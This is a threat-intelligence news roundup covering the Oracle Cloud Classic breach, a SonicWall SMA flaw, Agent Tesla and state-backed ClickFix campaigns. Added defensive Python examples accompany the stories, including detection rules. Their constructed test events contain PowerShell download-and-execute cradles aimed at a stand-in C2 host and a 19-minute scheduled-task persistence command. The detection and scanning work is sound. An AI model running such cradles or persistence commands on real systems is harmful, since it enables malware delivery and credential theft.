TRENDING TOPICS APR 17, 2025

Update: Oracle Legacy Server Breach Expands in Scope, Prompts CISA Advisory   

In a new advisory, CISA has flagged increased breach risks following the compromise of Oracle’s legacy Cloud Classic (Gen 1) servers, building on earlier reports but now emphasizing the potential for long-term credential misuse. Though Oracle initially claimed the incident involved "two obsolete servers" and did not impact current Oracle Cloud services, threat actors have since posted newer credential data from late 2024 and early 2025 on BreachForums. Security researchers and Oracle clients have verified portions of this leaked information, which includes LDAP display names, email addresses, hashed passwords, and user metadata; many of the credentials remain valid. Compounding the risk, the compromised credentials were likely embedded in automation tools, infrastructure templates, or scripts, making them harder to detect and replace. According to CybelAngel, attackers planted web shells and malware on legacy systems as early as January 2025 and accessed Oracle Identity Manager (IDM) databases containing sensitive user credentials until the breach was discovered in late February. These revelations directly challenge Oracle’s earlier assurance that the incident was limited to outdated infrastructure. CISA’s updated guidance reflects mounting concern that exposed credentials have been reused across unrelated systems or remain active within enterprise networks. The agency urges organizations to reset all potentially affected credentials, replace any embedded authentication tokens with secure alternatives, and implement phishing-resistant multi-factor authentication wherever possible. Monitoring authentication logs for anomalies and unauthorized access attempts is now critical, particularly for companies with historical ties to Oracle’s cloud services. Meanwhile, Oracle has continued issuing private notices to affected customers and recently confirmed a separate breach targeting Oracle Health (formerly Cerner), which exposed patient data at several U.S. healthcare facilities. This broader incident timeline, stretching from early January into March 2025, paints a more serious picture of coordinated and prolonged access to multiple Oracle-managed environments. For organizations that previously integrated with Oracle’s legacy platforms this is not just a historical concern; it is an ongoing risk that requires immediate mitigation.
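The advisory's hardest step is finding credentials that were baked into scripts and templates years ago. The following is an added example, not code from Hunter Strategy, CISA or Oracle: a small scanner that walks a directory of automation assets and flags lines that embed a secret, while skipping values that merely reference an environment variable or secret store. The regex patterns, the file suffix list, the reference markers and the sample files (hostnames and secrets included) are all constructed assumptions for illustration.

```python
import re
import tempfile
from pathlib import Path

# Common ways credentials get embedded in automation assets. These are
# assumed, illustrative patterns, not an exhaustive or Oracle-specific list.
PATTERNS = {
    "assignment": re.compile(
        r"(?i)(password|passwd|pwd|secret|api[_-]?key|token)\b\s*[:=]\s*['\"]?([^\s'\"]{6,})"
    ),
    "basic_auth_header": re.compile(r"(?i)authorization:\s*basic\s+([A-Za-z0-9+/=]{8,})"),
    "url_userinfo": re.compile(r"(?i)\b[a-z][a-z0-9+.-]*://([^\s:/@]+):([^\s/@]+)@"),
    "jdbc_oracle": re.compile(r"(?i)jdbc:oracle:thin:([^/\s]+)/([^@\s]+)@"),
}

# Markers showing the value points at a secret store or environment variable
# rather than being the secret itself (heuristic, assumed list).
REFERENCE_MARKERS = ("${", "$(", "$env:", "{{", "environ", "getenv", "vault:")
SCAN_SUFFIXES = (".sh", ".ps1", ".py", ".yaml", ".yml", ".tf", ".json", ".properties")


def looks_like_reference(value):
    v = value.lower()
    return v.startswith(("$", "%")) or any(m in v for m in REFERENCE_MARKERS)


def scan_text(text, source):
    """Return (source, line_number, kind) for each line holding an embedded credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pat in PATTERNS.items():
            m = pat.search(line)
            if not m:
                continue
            if kind == "assignment" and looks_like_reference(m.group(2)):
                continue  # key=value that only references an external secret
            findings.append((source, lineno, kind))
            break  # one finding per line is enough for triage
    return findings


def scan_tree(root):
    """Walk a directory of scripts and templates and collect findings."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            findings.extend(scan_text(path.read_text(errors="replace"),
                                      str(path.relative_to(root))))
    return findings


# Constructed sample files; hostnames and secrets are placeholders.
SAMPLES = {
    "deploy.sh": "export ORACLE_HOST=db.example.internal\n"
                 "export ORACLE_PASSWORD='Sup3rS3cret!'\n",
    "pipeline.yml": "steps:\n"
                    "  - run: curl -H 'Authorization: Basic dXNlcjpwYXNz' https://idm.example.internal/api\n",
    "app.properties": "db.url=jdbc:oracle:thin:appuser/Passw0rd@db.example.internal:1521/ORCL\n",
    "clean.py": "import os\npassword = os.environ['ORACLE_PASSWORD']\n",  # a reference, not a secret
}


def scan_samples():
    """Scan the constructed samples in memory."""
    findings = []
    for name, text in SAMPLES.items():
        findings.extend(scan_text(text, name))
    return findings


def scan_samples_on_disk():
    """Write the samples to a temporary tree and scan it the way a real run would."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, text in SAMPLES.items():
            (Path(tmp) / name).write_text(text)
        return scan_tree(tmp)


if __name__ == "__main__":
    for source, lineno, kind in scan_samples_on_disk():
        print(f"{source}:{lineno}: embedded credential ({kind})")
```

Every hit is a credential to rotate, not just to delete: the leaked value may already be in an attacker's hands, so the replacement goes into a secret store and the scanner is re-run until the tree is clean.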

Active Exploitation of SonicWall SMA Vulnerability Prompts CISA Directive 

CISA has issued a formal warning regarding CVE-2021-20035, a critical vulnerability affecting SonicWall’s Secure Mobile Access (SMA) 100 series appliances. Though initially patched in 2021 and originally rated as a denial-of-service risk, SonicWall recently revised its advisory to confirm that the flaw is now being actively exploited to achieve remote code execution. The vulnerability in the SMA management interface allows authenticated attackers with low privileges to inject and execute arbitrary commands as the 'nobody' user. By exploiting this flaw, attackers can control the targeted system through low-complexity, high-impact methods. Affected devices include the SMA 200, 210, 400, 410, and 500v running on platforms such as ESX, KVM, AWS, and Azure. Patches have been made available across several firmware branches, with fixes introduced in versions 10.2.1.1-19sv, 10.2.0.8-37sv, and 9.0.0.11-31sv, depending on the initial build. In response to confirmed in-the-wild exploitation, CISA has added CVE-2021-20035 to its Known Exploited Vulnerabilities (KEV) catalog, requiring all Federal Civilian Executive Branch (FCEB) agencies to apply patches no later than May 7, 2025, under Binding Operational Directive 22-01. Although this deadline applies to federal systems, CISA strongly urges all public and private organizations to prioritize remediation due to the ease of exploitation and potential impact. This advisory follows multiple critical SonicWall vulnerabilities disclosed in early 2025, including an authentication bypass in Gen 6 and Gen 7 firewalls that allowed VPN session hijacking and a zero-day in SMA1000 secure access gateways. These incidents highlight a trend of threat actors targeting SonicWall appliances to establish footholds in enterprise networks. Organizations are advised to inventory all SMA deployments, verify patch levels, monitor for unusual authentication attempts, and restrict management interface exposure to trusted networks only. Failure to act could compromise remote access systems that often serve as gateways into broader internal infrastructure.
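"Verify patch levels" is easy to get wrong when three firmware branches each have their own fixed build. The following is an added example, not code from Hunter Strategy, CISA or SonicWall: it parses SMA firmware version strings of the form shown above (`10.2.1.1-19sv`), maps each appliance to its branch, and reports whether it is at or past the fixed build. It assumes the first three numeric components identify the branch, which is a modelling assumption, not vendor documentation; the inventory, its device names and every version other than the three fixed builds are constructed.

```python
import re
from typing import NamedTuple


class SmaVersion(NamedTuple):
    release: tuple  # numeric components, e.g. (10, 2, 1, 1)
    build: int      # the build number from the "-19sv" suffix


VERSION_RE = re.compile(r"^(\d+(?:\.\d+){3})-(\d+)sv$")


def parse_version(text):
    """Parse '10.2.1.1-19sv' into SmaVersion((10, 2, 1, 1), 19); reject other shapes."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised SMA firmware version: {text!r}")
    return SmaVersion(tuple(int(p) for p in m.group(1).split(".")), int(m.group(2)))


# First fixed build on each firmware branch, as listed in the advisory summary.
FIXED = [parse_version(v) for v in ("10.2.1.1-19sv", "10.2.0.8-37sv", "9.0.0.11-31sv")]


def branch_of(v):
    # Assumption: the first three components identify the firmware branch.
    return v.release[:3]


def assess(text):
    """Classify one appliance's firmware as patched, vulnerable or unknown-branch."""
    v = parse_version(text)
    fix = next((f for f in FIXED if branch_of(f) == branch_of(v)), None)
    if fix is None:
        return "unknown-branch"  # not covered by the listed fixes; consult the vendor advisory
    return "patched" if (v.release, v.build) >= (fix.release, fix.build) else "vulnerable"


# Constructed inventory; device names and all versions other than the fixed builds are made up.
INVENTORY = [
    ("sma-410-hq", "10.2.1.1-19sv"),
    ("sma-210-branch", "10.2.1.0-17sv"),
    ("sma-500v-aws", "10.2.0.8-37sv"),
    ("sma-400-dc", "9.0.0.10-28sv"),
    ("sma-500v-azure", "10.2.1.2-24sv"),
    ("sma-200-lab", "10.1.0.5-10sv"),
]


def assess_inventory(inventory=INVENTORY):
    """Return {device_name: status} for every appliance in the inventory."""
    return {name: assess(version) for name, version in inventory}


if __name__ == "__main__":
    for name, status in assess_inventory().items():
        print(f"{name:16} {status}")
```

An `unknown-branch` result is deliberately not reported as safe: a branch the fixed-version list does not cover needs a human check against the vendor advisory rather than a silent pass.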

Update: Agent Tesla Returns with Multi-Stage Delivery and Script-Based Evasion 

Recent research from Broadcom has uncovered a new round of Agent Tesla campaigns that use highly structured, multi-step infection chains to bypass traditional defenses. The attack begins with a socially engineered email containing an archive attachment, often tailored to look legitimate. Inside is a JavaScript file that, once executed, launches a PowerShell script as the second stage. PowerShell is used to download and run additional payloads directly in memory, helping the attacker avoid triggering antivirus tools that rely on scanning files. The malware is ultimately injected into a trusted running process, allowing it to steal data without raising immediate red flags. This fileless approach makes the campaign more difficult to detect and gives attackers prolonged access to compromised systems. Agent Tesla’s use in this setup points to a continued focus on credential harvesting, clipboard monitoring, and exfiltration of sensitive user data. Security vendors are responding by strengthening detection at multiple layers. Symantec has deployed new adaptive and behavior-based signatures that catch script-based activity and look for signs of abuse in the PowerShell and WScript engines. They also flag behavioral anomalies using SONAR technology to detect unusual process execution and suspicious outbound connections. Network-level protections now focus on identifying script hosts attempting external communication, while web filtering blocks access to known malicious infrastructure. VMware Carbon Black adds to the defense with real-time cloud-based scanning, delaying execution until the file’s reputation is confirmed. These defenses reflect the need to detect threats not only by scanning files but also by observing how scripts behave once executed. Organizations should re-evaluate email protections, restrict script execution, and reinforce user training around identifying phishing attempts, as these entry points remain the most consistent weakness in the attack chain.

Update: State-Backed Threat Actors Adopt ClickFix for Stealthy Malware Deployment 

Between late 2024 and early 2025, state-sponsored actors from North Korea, Iran, and Russia began leveraging a deceptive tactic called ClickFix to deliver malware through carefully crafted phishing campaigns. Unlike traditional malware delivery, ClickFix tricks victims into executing malicious PowerShell commands by framing the process as part of a legitimate task, such as completing a CAPTCHA, registering a device, or fixing a system error. Proofpoint researchers observed TA427 (Kimsuky) using this method to target individuals linked to North Korean policy discussions by spoofing diplomatic identities and guiding them through fake embassy websites. Victims were persuaded to manually run commands that initiated a multi-stage infection chain, resulting in the download of Quasar RAT, a remote access trojan. The process included dropping a Visual Basic Script scheduled to execute every 19 minutes, ultimately delivering batch scripts that deployed the final payload, all while displaying decoy documents to distract the user. Iran-linked TA450 (MuddyWater) also integrated ClickFix into its operations by disguising malicious payloads as Microsoft security updates during Patch Tuesday. The phishing messages pushed recipients to run PowerShell as an administrator, then enter commands that installed legitimate remote monitoring software, later used for espionage and data exfiltration. This campaign targeted the Finance, Government, and Transportation sectors across several regions, including the U.S., Canada, and the Middle East. Around the same time, a suspected Russian group, UNK_RemoteRogue, launched its own ClickFix campaign using compromised Zimbra servers to send lure emails to defense-related organizations. These emails led to spoofed web pages with detailed instructions, and even tutorial videos, guiding users to paste code into PowerShell, which executed commands tied to the Empire C2 framework. This convergence of threat actors adopting ClickFix in rapid succession signals the technique's effectiveness and its likely continued use across different geopolitical regions and objectives.
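Both the Agent Tesla chain above (archive, JavaScript, script host spawning PowerShell, in-memory download) and the ClickFix pattern (a user pasting a PowerShell download cradle, plus a script scheduled at a short interval) show up in the same place: process-creation telemetry with parent image, image and command line. The following is an added example, not code from Hunter Strategy, Broadcom, Symantec or Proofpoint: a small rule set run over constructed process-creation events in a Sysmon-style shape. Rule names, thresholds (the 30-minute task interval), the indicator lists and every event, path and hostname are assumptions built for illustration; the encoded-command sample is generated inline so the decoder can be exercised offline.

```python
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Indicators of a download-and-run cradle or in-memory execution (heuristic, assumed list).
CRADLE_RE = re.compile(
    r"(?i)downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|\birm\b|invoke-expression|\biex\b|frombase64string"
)
ENC_RE = re.compile(r"(?i)(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{16,})")
DOWNLOADED_SCRIPT_RE = re.compile(r"(?i)\\downloads\\[^\"]*\.(?:js|jse|vbs|vbe|wsf|hta)\b")
SCHTASKS_RE = re.compile(r"(?i)/sc\s+minute\s+/mo\s+(\d+)")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def effective_cmdline(cmd):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so rules can see it."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmd  # not a real encoded command; evaluate the raw line


def evaluate(event):
    """Return the list of rule names one process-creation event triggers."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = effective_cmdline(event["cmdline"])
    hits = []
    if image in SCRIPT_HOSTS and DOWNLOADED_SCRIPT_RE.search(cmd):
        hits.append("script_host_runs_downloaded_script")      # stage 1 of the Agent Tesla chain
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        hits.append("script_host_spawns_powershell")           # stage 2 handoff
    if image in POWERSHELL and CRADLE_RE.search(cmd):
        hits.append("powershell_download_cradle")              # in-memory download/run
        if parent == "explorer.exe":                           # typed or pasted by the user: ClickFix shape
            hits.append("user_launched_cradle_clickfix")
    if image == "schtasks.exe":
        m = SCHTASKS_RE.search(cmd)
        if m and int(m.group(1)) <= 30 and any(h in cmd.lower() for h in SCRIPT_HOSTS):
            hits.append("short_interval_script_task")          # e.g. a VBS every 19 minutes
    return hits


def triage(events):
    """Map event id -> triggered rules, keeping only events that triggered something."""
    result = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            result[event["id"]] = hits
    return result


# Constructed sample: the encoded payload is built here, not captured from a real host.
ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2')".encode("utf-16le")
).decode()

# Constructed process-creation events (paths, users and hosts are placeholders).
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\invoice_0417.js"'},
    {"id": 2, "parent": r"C:\Windows\System32\wscript.exe", "image": PS_PATH,
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2.example.invalid/a.ps1')\""},
    {"id": 3, "parent": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "cmdline": f"powershell.exe -NoProfile -EncodedCommand {ENC_PAYLOAD}"},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 19 /tn "SysUpdate" /tr "wscript.exe C:\Users\Public\u.vbs" /f'},
    {"id": 5, "parent": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "cmdline": "powershell.exe Get-Process | Sort-Object CPU"},        # benign admin use
    {"id": 6, "parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},                                # benign
]

if __name__ == "__main__":
    for event_id, rules in triage(EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Event 5 is the point of the `explorer.exe` rule being conditional on a cradle: an administrator launching PowerShell interactively is normal, and only the combination of a user-launched shell with download-and-execute content matches the ClickFix shape. The encoded-command decoding matters for the same reason; without it, rule matching on the raw command line sees nothing but base64.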

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.